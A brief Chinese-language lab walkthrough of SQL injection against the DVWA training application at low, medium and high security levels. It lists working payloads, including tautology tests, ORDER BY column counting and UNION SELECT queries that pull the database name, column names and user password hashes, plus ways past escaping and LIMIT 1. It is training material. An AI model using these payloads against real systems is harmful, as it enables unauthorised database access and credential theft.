DVWA之SQL注入（低中高级）

Low
一、判断注入类型
1、输入1，查询成功

2、输入1’ or 1='1查询成功

二、查询数据库中字段数
1、输入 2、输入1’ or 1=1 order by 3#
1’ or 1=1 order by 1# 查询失败
1’ or 1=1 order by 2#均查询成功

判断数据库语句中只有两个字段名，First name和Surname

三、查询数据库的库名
输入’union select database(),user()’
查询到当前数据库名为dvwa
四、查询数据库中表名称

五、获取表中字段名
'union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’#

六、尝试获取user及password
'union select user,password from users#

七、尝试破解口令

Medium
查看源码发现特殊字符被mysqli_real_escape_string函数转义
一、输入1’ or 1=1 #
发现‘’被函数转义

二、输入 1 or 1=1# 查询成功

High
查看源码发现相比于medium知识添加了LIMIT1，可通过#将其注释

'union select user,password from users#成功注入